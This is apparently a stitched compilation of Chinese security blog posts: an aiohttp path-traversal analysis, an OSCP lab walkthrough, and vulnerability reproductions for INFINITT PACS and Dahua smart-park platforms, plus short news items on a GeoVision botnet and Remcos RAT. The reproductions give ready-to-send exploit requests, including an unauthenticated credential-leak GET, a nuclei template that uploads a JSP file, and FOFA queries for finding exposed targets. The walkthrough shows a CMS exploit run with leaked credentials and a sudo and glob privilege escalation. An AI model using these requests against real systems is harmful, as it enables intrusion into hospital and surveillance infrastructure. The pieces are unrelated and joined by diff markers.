来到处理器对应的方法后会取出先前的文件名然后创建Path类Path类对判断系统分出Windows系统或是其它系统如果是Window系统会调用_from_parts将文件名中的/都转换成\。然后会判断filename.anchor这里的作用就是不允许http请求的静态资源文件名存在类似于网络共享路径或本地盘符路径的写法。![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nYNsRtVfD6mwdSEDCGr4D28zxwTfShT12v3micgFQ8xeNCVRsez2ibT8w/640?wx_fmt=png&from=appmsg "")
```
```
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nkSzPshlhG2z4SRWQy5RytIPhicCs1ytO9DK5OC41YnbYJp0TCsYB9UQ/640?wx_fmt=png&from=appmsg "")
最终来到了漏洞的语句filepath = self._directory.joinpath(filename).resolve()中在处理joinpath的时候它会将filename以为\分开分成驱动器parts同样也会将前面预先有的静态文件的绝对路径以同样的形式分开一起传入到join_parsed_parts中。
这里的以E:\\src\images\icon.jpg表示的话drv=E root=\\ parts=[E:\\,src,images,icon.jpg]而filename请求文件名的drv2=空 root2=空 parts=图中所示
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30n0W141BRnU7YB2rmQa8FDTg2BQJuNhSCAibOibJB4ja9DbzKibmc3AT1ng/640?wx_fmt=png&from=appmsg "")
在join_parsed_parts中会进行条件判断(看下面)我们的请求方式会来到第三个else因为我们访问的静态资源取出的filename是相对路径没有驱动器也没有\\,最终返回的其实是 ('E:', '\\', ['E:\\', 'aiohttp', 'src', 'images', 'images', 'icon.jpg', '..', '..', 'data.db'])其实前面的两个条件判断处理也是为了最终返回的parts要是完整的绝对路径但是没有对..进行处理。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nTWVAia4s2kDH03ULhRrEbQibUz0IHvC2GjrbwzljJ22oU0o2VTSP6quQ/640?wx_fmt=png&from=appmsg "")
- 当 root2 不为空时 drv2 为空且 drv 不为空时 drv 保留 root2 作为新的根并将第二个路径的部分连接起来形成一个新的路径元组。
- 当 drv2 不为空时判断两个驱动器是否相同如果相同则认为第二个路径是相对于第一个路径的将第一个路径的信息作为新路径的一部分并将第二个路径的部分连接起来形成一个新的路径元组。
- 当以上条件不满足时,将第二个路径作为非锚定的路径(即普通路径)处理,将两个路径的部分连接起来,形成一个新的路径元组。
返回了绝对路径的parts之后来到resolve方法resolve方法会通过os.path.realpath对self也就是刚才parts部分进行处理规范化了路径将两个..去掉,并把目录往前移了两位。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nFB2DHDyv5mRIShHBwoicncibVu8pSNGTYr0He11xgdFU3IvdxiaFGme6A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30n6Bibiaahcd4Pwr7mrSib7QibWicyffP7SZlTZUCOic4t2KABymuiccLzvCPdw/640?wx_fmt=png&from=appmsg "")
继续往handler下面走如果前面得到的规范化路径也就是E:\\aiohttp\src\images\data.db是一个目录则将目录转换成html页面返回如果是文件则使用FileResponse返回。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nictJy6m2wDdBTiaIkbIpKTTtNmJwgvzRNAnTqUIoLt33iaIN1l7Cd8n3g/640?wx_fmt=png&from=appmsg "")
直至这一步filepath就被确定了到FileResponse后面还有挺多处理的包括根据Content-Type来进行不同的响应如Gzip、application/octet-stream等以及各种请求头做对应的处理等等就不继续看下去了。
为什么follow_symlinks==True当follow_symlinks!=True回进入relative_to获取文件的路径这也是后面修复使用的方法。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nicmz1sbv7HeF67IXk0ViaoHZ74fACmhqW3ysFKPHrSoGfh98XUqu6DcA/640?wx_fmt=png&from=appmsg "")
# 修复
修复主要是改变了原先路径的拼接方式将拼接的方式改到了relative_to方法通过比较请求的filename路径相对于指定的静态目录路径如果请求的filename路径不是静态目录的子路径则会抛出异常最终返回404
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30noVKTiaYhrZ1l8svX8TLuFw9YQnBF3Zib031E8HC5JN1wcJDnKc1u9xLw/640?wx_fmt=png&from=appmsg "")
```
```
> 首先,将当前路径(filename路径)和传入的其他路径(静态目录路径)参数进行解析提取出各自的驱动器drive、根路径root、路径部分parts等信息。接着根据条件判断当前路径和其他路径的情况包括是否带有根路径或驱动器等。进行路径的比较判断当前路径是否是其他路径的子路径或在同一目录结构下如果不是则抛出异常。如果当前路径是其他路径的子路径则返回当前路径相对于其他路径的相对路径。
# 总结
主要是因为开发者在对follow_symlinks==True情况时处理的方法不对导致的没有对请求的filename路径与静态文件的路径进行比较判断是否是子路径导致的问题。写的比较啰嗦主要还是为了看看aiohttp这个框架的代码为了达到异步里面用了很多的await对定义函数的处理。
来源https://xz.aliyun.com/   感谢【
Aiwin

View File

@ -0,0 +1,271 @@
# 【OSCP-Medium】adria
原创 Beret-SEC 贝雷帽SEC 2024-11-18 01:21
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**OSCP 靶场**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
## 靶场介绍
<table><tbody><tr style="height: 33px;"><td width="100" style="border-width: 1px;border-style: solid;border-color: rgb(217, 217, 217);"><p style="margin: 0;padding: 0;min-height: 24px;"><span>adria</span></p></td><td width="82" style="border-width: 1px;border-style: solid;border-color: rgb(217, 217, 217);"><p style="margin: 0;padding: 0;min-height: 24px;"><span>medium</span></p></td><td width="575" style="border-width: 1px;border-style: solid;border-color: rgb(217, 217, 217);"><p style="margin: 0;padding: 0;min-height: 24px;"><span>smb、Subrion CMS 、脚本分析、sudo-scalar 提权、id_rsa、pspy64</span></p></td></tr></tbody></table>
## 信息收集
### 主机发现
```
nmap -sn 192.168.1.0/24
```
### 端口扫描
```
┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p- -Pn -T4 192.168.1.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 13:27 +06
Nmap scan report for adria (192.168.1.61)
Host is up (0.0014s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Did not follow redirect to http://adria.hmv/
|_http-server-header: Apache/2.4.57 (Debian)
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2024-03-09T07:28:22
|_ start_date: N/A
|_clock-skew: 48s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ADRIA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
```
添加域名访问web
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLa0aFHAIkZib0etlbicy6ZKKn9KbCjzw0JOH8qPTu5l7lZ6YQFtXSsX2A/640?wx_fmt=png&from=appmsg "")
### 目录扫描
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLAvpnmgiclrewnjWO4coh5l5WDO2aAkYlOLDeBVT4AenrmjGuN1b7ztw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLcaN3hWf9ibhQ6bcibpZAxSibh1iasKf6BgMtE9CTHqw97DZuoouKB0NKDg/640?wx_fmt=png&from=appmsg "")
### SMB 扫描
使用 enum4linux 扫描发现了用户和DebianShare 共享目录
```
enum4linux -a 192.168.1.61
```
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLQjOsXSIYWcU6bCKhnuR7zuWrgp47eXoGLQLibS6C84AcQ9Wa3w4fmzw/640?wx_fmt=png&from=appmsg "")
使用smbclient 获取到一个configz.zip  压缩包
```
smbclient -N -L \\\\192.168.1.61
```
```
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L \\\\192.168.1.61
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
DebianShare Disk
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.1.61 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~]
└─$ smbclient -N \\\\192.168.1.61/DebianShare
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Dec 4 15:32:45 2023
.. D 0 Sat Jul 22 14:10:13 2023
configz.zip N 2756857 Mon Nov 6 21:56:25 2023
19480400 blocks of size 1024. 15678200 blocks available
smb: \>
```
我们从压缩包里面找到了账号密码
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLicjVLeCt29kH2656fz1ousQMibcYvt96T3WSZYQsWmSN3UKiaTQ8TZEaQ/640?wx_fmt=png&from=appmsg "")
使用账号密码可登录到后台
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLWviaNpibbZeG3cRXn1NK8SRq5cibyeq9gtWc07h34gicEHSONF3BBDIJRA/640?wx_fmt=png&from=appmsg "")
## 权限获取
通过searchsploit 漏洞库里面找到exp
```
searchsploit Subrion CMS
searchsploit -m 49876
```
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLWOAB6vnEdT7umibcpPEpGPBuuukib8ZkokRgALXbrOMDhRfnjr1DCXgg/640?wx_fmt=png&from=appmsg "")
使用前面收集到的账号密码进行利用
```
┌──(kali㉿kali)-[~]
└─$ python3 49876.py
[+] Specify an url target
[+] Example usage: exploit.py -u http://target-uri/panel
[+] Example help usage: exploit.py -h
┌──(kali㉿kali)-[~]
└─$ python3 49876.py -h
Usage: 49876.py [options]
Options:
-h, --help show this help message and exit
-u URL, --url=URL Base target uri http://target/panel
-l USER, --user=USER User credential to login
-p PASSW, --passw=PASSW
Password credential to login
```
```
python3 49876.py -u http://adria.hmv/panel/ -l admin -p jojo1989
```
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLrGiccTENGrb0bWwLuX2b3BsVib0XFPI9mLCXPG0NSRdFvtDPrl1XgLYA/640?wx_fmt=png&from=appmsg "")
为了方便操作我们反弹一个交换shell
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLia0N8gsKr8s94DVzqmV5jtXibibUYFvGvhs4J9lX4lolWWjqhMvovichqQ/640?wx_fmt=png&from=appmsg "")
## 权限提升
### 普通账号
```
www-data@adria:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
.....
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
adriana:x:1001:1001:,,,:/home/adriana:/bin/zsh
mysql:x:104:111:MySQL Server,,,:/nonexistent:/bin/false
www-data@adria:/var/www/html$ cd /home
www-data@adria:/home$ ls
adriana
www-data@adria:/home$ cd adriana/
bash: cd: adriana/: Permission denied
```
查看sudo -l 可以看到adriana 用户可以使用scalar命令 Scalar 一个用于管理大型 Git 存储库的工具
```
scalar命令使用https://man7.org/linux/man-pages/man1/scalar.1.html
项目地址https://github.com/microsoft/scalar
```
```
www-data@adria:/home$ sudo -l
Matching Defaults entries for www-data on adria:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on adria:
(adriana) NOPASSWD: /usr/bin/scalar
```
这里我们输入help 查询帮助,会有一个交互界面,我们输入!bash 直接提权到了adriana 用户![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLFwd62sPAq8iavSo69uJ4bAKWSvArLsD2kHfudAofygFafshk5naTnqA/640?wx_fmt=png&from=appmsg "")
这里发现发现存在id_rsa 私钥,我们私钥进行登录。
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaL1JvJPsothfibN3HBz7IXGjRX5pR0vaicnO4sMaFXywB7huHgJ3GVHL6A/640?wx_fmt=png&from=appmsg "")
### ROOT提权
sudo -l 查看。可以免密执行backup 脚本。
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaL67REhbav0Sy8nxAzFGYrrMgTbVdibKf2vYW2rhduNhY1kjnYloeOVgw/640?wx_fmt=png&from=appmsg "")
该脚本检索存储在/root/pass中的 root 密码。然后,它提示用户输入密码。如果输入的值与$PASSWORD变量中存储的密码匹配则会打印“授予访问权限”消息然后将html目录压缩到 .zip 文件中,并使用/root/pass中存储的密码进行加密。如果值不同它只会打印“访问被拒绝”消息。
```
╭─adriana@adria ~
╰─$ ls -all /opt/backup
-rwxr-xr-x 1 root root 294 Nov 6 08:35 /opt/backup
╭─adriana@adria ~
╰─$ cat /opt/backup
#!/bin/bash
PASSWORD=$(/usr/bin/cat /root/pass)
read -ep "Password: " USER_PASS
if [[ $PASSWORD == $USER_PASS ]] ; then
/usr/bin/echo "Authorized access"
/usr/bin/sleep 1
/usr/bin/zip -r -e -P "$PASSWORD" /opt/backup.zip /var/www/html
else
/usr/bin/echo "Access denied"
exit 1
fi
╭─adriana@adria ~
```
第7行的$PASSWORD == $USER_PASS两个变量都没有加上引号呈现上就是如果输入通配符*或者?的话会直接匹配成真  
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLwO6YJ96FqHzZVVw7b1R69oVRRhFibB7wDKibJWM4RvmMqibEyeiaFj9hsg/640?wx_fmt=png&from=appmsg "")
我们尝试输入* 号可以发现条件成立直接进入if 条件。
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLvzxSdewa3mc72UJVakQeLloMnqQYNeJJ3DbjrrfI2JIDYMkNjGMPcg/640?wx_fmt=png&from=appmsg "")
但是这里我们是看不到密码的此时我们可以下载pspy64 进行进程
```
https://github.com/DominicBreuker/pspy/releases
```
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLE14PAfGRRibxx1mTksMKicQ61yDCJ6l5lA2QA77qFibfuC7sEibZ2CpFZQ/640?wx_fmt=png&from=appmsg "")
或者执行如下命令进行监视后台进程
```
watch -n 0.1 -d "ps aux | grep -ai /usr/bin/zip"
```
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaLxv16VIM2ibArlZJ6KuBezZOkP2bVzpUhqTSpEKbgHQRJElzRrHLkv4A/640?wx_fmt=png&from=appmsg "")
获取root 密码后成功登录到系统获取flag
```
8eNctPoCh4Potes5eVD7eMxUw6wRBmO
```
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCB6ys5G2YsWAcsAyDg8ib8iaL4EdpzxhwrDyTuxlsXEQYeEIgzYQ2hSWia5Ek37JRBvHcDysv4mJQfLQ/640?wx_fmt=png&from=appmsg "")
                                        
End
“点赞、在看与分享都是莫大的支持”
![](https://mmbiz.qpic.cn/mmbiz_png/lcbWX2ticDCDACJgvibBSia6MChia78vgBGURXW2Sq5o3uZTdw9oeR6yn90jH0BZrS0pl9ibYXicoDSXU8YkRQ49FjCA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/pM2klgicgT5dylTzXyrXBmex6dlAsZ0QJOQdzqcw2HpC49rnL0dTHNsWsOze4QmRYN7fPRoLdVK5MXs0DXtOvZw/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")

View File

@ -0,0 +1,44 @@
# 【漏洞复现】英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞
原创 清风 白帽攻防 2024-11-18 01:20
## 免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
简介
英飞达医学影像存档与通信系统主要用于医院影像科室负责将日常生成的各种医学影像如核磁共振、CT、超声、X光、红外、显微镜等设备的图像通过不同接口如模拟信号、DICOM协议、网络传输进行数字化保存。这些影像数据被海量存储并能在授权下快速调取使用同时提供一些辅助诊断和管理功能。该系统在不同影像设备之间传输数据和组织存储数据方面发挥着重要作用。
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dakQkvYTcT4pr9bd9LAZXf7uo75HCmHZyuKiaMdDTkQCuZf2ehJAWyMoX8yUkOb8BO5MILwYPKqsA/640?wx_fmt=png&from=appmsg "")
漏洞描述
英飞达医学影像存档与通信系统在/webservices/WebUserLogin.asmx/接口处存在信息泄露漏洞,攻击者无需身份验证即可
利用该漏洞获取系统后台管理员的账户密码信息,进而登录后台,导致系统安全性严重受损。
fofa语法```
"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
```
漏洞复现```
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
Host: IP
```
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dakQkvYTcT4pr9bd9LAZXfzTGSyib6iaXmToYhh1oDOCXWK6UExxSbFI8C2aNt48VOJZQtxq09gGXA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dakQkvYTcT4pr9bd9LAZXfufCRwgzVRRG0MDdXRztFwicfdHxpn3V85bAhFx9qibUBE9QNKvCaIdSw/640?wx_fmt=png&from=appmsg "")
批量检测批量检测POC工具请在公众号知识星球获取
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dakQkvYTcT4pr9bd9LAZXfGF0RXrCPv4QfCtlnb8XpyLGX37tuRZknUrNYXBVFWu6RzTW1iamW9uA/640?wx_fmt=png&from=appmsg "")
修复建议
1、关闭互联网暴露面或接口设置访问权限
2、及时更新补丁或升级至安全版本
网安交流群
![](https://mmbiz.qpic.cn/mmbiz_jpg/yu6trpdUX0efFOzibVic3qjn100tFgpUIh7ib8g9cKajewKFM5kXP350q21SCLvlgO6yx1tlia8VYxI4j3cv57FqFg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,21 @@
# 一键检测 17 个蓝凌 OA 历史漏洞
原创 xazlsec 信安之路 2024-11-18 02:16
近日完成了针对蓝凌 OA 历史漏洞的梳理和 POC 编写,信安之路 POC 管理系统共计收录其 17 个历史漏洞 POC信安之路内部文库已同步更新漏洞复现案例及相关内容如图
![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAffeIPsxBj8lkrkiac2Ta0vAxc8882EDv0Z553aU5Qp7Usz9DXpjHSdwicFtwZOibKbrHbwL7TdoEHDUQ/640?wx_fmt=png&from=appmsg "")
上面工具使用 xazlscanPOC 管理系统配套脚本)进行一键测试,大大提高漏洞探测的效率,该工具还支持多线程指纹识别,针对大量网站,一键完成指纹识别与漏洞探测,大大提高渗透测试人员的工作效率。项目地址:
> https://github.com/myh0st/xazlscan
其中指纹识别部分,会实时下载 POC 系统中最新的指纹库到本地,通过本地请求目标网站,进行指纹识别,最后根据指纹识别结果从 POC 系统查询相关 POC 并下载至本地的 POC 目录下,再根据指纹识别的结果调用本地的 nuclei 进行漏洞探测,识别到漏洞之后,可以根据指引,一键打开文库中关于该漏洞的说明,其中包括漏洞复现的方式、漏洞利用技巧、漏洞原理分析、漏洞修复方案等内容(目前内容尚不完善,后续将逐步更新)。
下载 POC 需要消耗平台积分,为了平台的持续稳定发展,切勿使用该平台做未授权测试,一切均应在法律允许范围内完成渗透测试,积分可以通过赞助平台获得,目前处于试运行阶段,需要招募一些种子用户,赞助 1999 可获得 30000 平台积分,并赠送一年信安之路知识星球使用权。
![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAffeIPsxBj8lkrkiac2Ta0vAx1wLvcxLSiaLBibMpnVy24ib4Q7otC1GG2ePSk5a3ZrH9NchnRZ2EnZTOw/640?wx_fmt=png&from=appmsg "")
目前平台收录了 3676 个 POC全部下载需要消耗 18380 积分,成为种子用户,意味着可以下载所有 POC并且后续的更新也将覆盖所以越早加入越早参与到平台的建设和维护期待与你一起进步。
![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfc1ibbG6mEdqV5Xpw0yu9UxtIoLlhiazxU4NakInEiam1mOnHHYw4pVq3nrrCc8tpnn5ictdhmNLUaHuA/640?wx_fmt=png&from=appmsg "")

View File

@ -0,0 +1,21 @@
# 僵尸网络利用GeoVision零日漏洞入侵已停产设备
鹏鹏同学 黑猫安全 2024-11-18 03:31
![](https://mmbiz.qpic.cn/sz_mmbiz_png/8dBEfDPEce8RJzryJUo3WY0AjBJGNhHKHC2VOPjJNTnzyGQUjCDkWFTLpL2LkyhPJuOG9veGAqo2ua7SictJcBw/640?wx_fmt=png&from=appmsg "")
Shadowserver基金会的研究人员观察到僵尸网络正在利用GeoVision EOL设备中的零日漏洞入侵野外设备。被追踪为CVE-2024-11120CVSS 9.8的GeoVision零日漏洞是一种未经验证的命令注入漏洞Shadowserver基金会首先发现TWCERT则帮助验证该漏洞。该漏洞影响以下EoL产品
- GV-VS12 
- GV-VS11 
- GV-DSP_LPR_V3 
- GVLX 4 V2 
- GVLX 4 V3
according to TWCERT的警告该漏洞导致某些EOL GeoVision设备出现操作系统命令注入漏洞未经验证的远程攻击者可以利用该漏洞注入和执行设备上的任意系统命令。
该漏洞已经被攻击者利用我们已经收到相关报告。僵尸网络用于执行DDoS或加密货币攻击。Shadowserver基金会称约有17,000个Internet-facing GeoVision设备易受到CVE-2024-11120零日漏洞的攻击。根据Shadowserver基金会的数据易受攻击的设备中美国占了9,179个德国占了1,652个台湾占了792个加拿大占了784个。

View File

@ -0,0 +1,162 @@
# 大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【漏洞复现|附nuclei-POC】
原创 kingkong 脚本小子 2024-11-18 00:35
****
**免责声明:**
**本文内容仅供技术学习参考,请勿用于违法破坏。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与作者无关。如有侵权请联系删除。**
****
**漏洞描述:**
大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏。
攻击者可通过上传包含恶意代码的文件到服务器,使恶意文件被执行,从而导致系统被入侵或遭受其他安全风险。
01
**Nuclei POC**
```
id: dahua-zhihuiyuanqu-hasSubsystem-fileupload
info:
name: 大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞
author: kingkong
severity: high
metadata:
fofa-query: app="dahua-智慧园区综合管理平台"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Java/1.8.0_345
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 229
Connection: close
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<%out.println("test");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
GET /upload/emap/society_new/{{data_url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200'
- 'contains(body_1,"data")'
- 'contains(body_2,"test")'
condition: and
extractors:
- type: regex
name: data_url
part: body_1
group: 1
regex:
- (ico_res_[a-zA-Z0-9]{12}_on.jsp)
internal: true
```
02
搜索语法
```
FOFAapp="dahua-智慧园区综合管理平台"
```
![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohncB4ElELKGic8fxpuVaU1cKznGE6PUtyzaTaDiaIQbnO7SNBxkkhs4HVic2BQjjfLlXG2yaJXewHJTqw/640?wx_fmt=png&from=appmsg "")
界面如下
![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohncB4ElELKGic8fxpuVaU1cKzHcbmWPkVoKweiaTP3iczuYnO0l2jyBduxFGxdTibegoOibhfOf6HViceib9A/640?wx_fmt=png&from=appmsg "")
03
漏洞复现
![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohncB4ElELKGic8fxpuVaU1cKzwVWH7GaSNfvGjibY9Nm4sLMuuKHBVrcgKlSGEZ3ha8MmpsZoZXrgIng/640?wx_fmt=png&from=appmsg "")
访问验证
![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohncB4ElELKGic8fxpuVaU1cKzUT5RYl3KyluWKLL7WjRSEH3Gr3B3vuyib9uBKpXuLOxI8KibqS3wicg9w/640?wx_fmt=png&from=appmsg "")
漏洞检测POC
```
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host:
User-Agent: Java/1.8.0_345
Content-Length: 317
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Accept-Encoding: gzip
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<%out.println("test");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
GET /upload/emap/society_new/ico_res_dca73685d934_on.jsp HTTP/1.1
Host:
```
neclei批量检测截图
![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohncB4ElELKGic8fxpuVaU1cKz6NfiaucdeXBTiaicXUKibSFBTLfOk3DV1Zq0nSD0Tsib0AEUiaurHqgR8DjQ/640?wx_fmt=png&from=appmsg "")
04
修复建议
1、文件类型验证仅允许上传特定类型的文件例如图像、文档等并拒绝可执行文件或其他潜在的恶意文件类型。
2、文件大小限制限制上传文件的大小以防止恶意用户上传过大的文件导致服务器资源耗尽。
3、文件名处理对上传的文件进行重命名避免使用用户提供的文件名以防止路径遍历攻击。
05
下载地址
进入公众号点击POC可获取所有POC文件
![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohneS7aOPfDNKhvOicibVlyrkJ3A4EuUx5c5S8eAxFnF9KiaibAGJfP6ibB6ze4Rm4pZ7MI4jQibT05lTevqg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")

View File

@ -0,0 +1,22 @@
# 安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序
信安网络技术 2024-11-18 00:36
IT之家 11 月 15 日消息,安全公司 Fortinet 发布报告,称最近有黑客利用 5 年前公布的 CVE-2017-0199 漏洞,瞄准 Office 企业用户发动攻击。
IT之家参考报告获悉相关黑客首先发送一批伪造成公司业务往来信息的网络钓鱼邮件其中带有含有木马的 Excel 附件。一旦收件人打开附件,就会看到相关文件受到保护,要求用户启用编辑功能才能查看内容,**在用户点击“启用编辑”按钮后,便会触发 CVE-2017-0199 远程代码执行漏洞**,之后受害者设备便会在后台自动下载运行黑客预备的 HTML 文件HTA
![](https://mmbiz.qpic.cn/mmbiz_jpg/KGSIlMW3xHfjdbzxaBbOTWRDdpNhc4OLjbv7Jn6vgmGZJ8csfI3IrlibZysWia7BSfb64XKYH4deHj8gO3GIiaj1w/640?wx_fmt=jpeg&from=appmsg "安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序")
安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序
▲ 黑客制造的虚假邮件
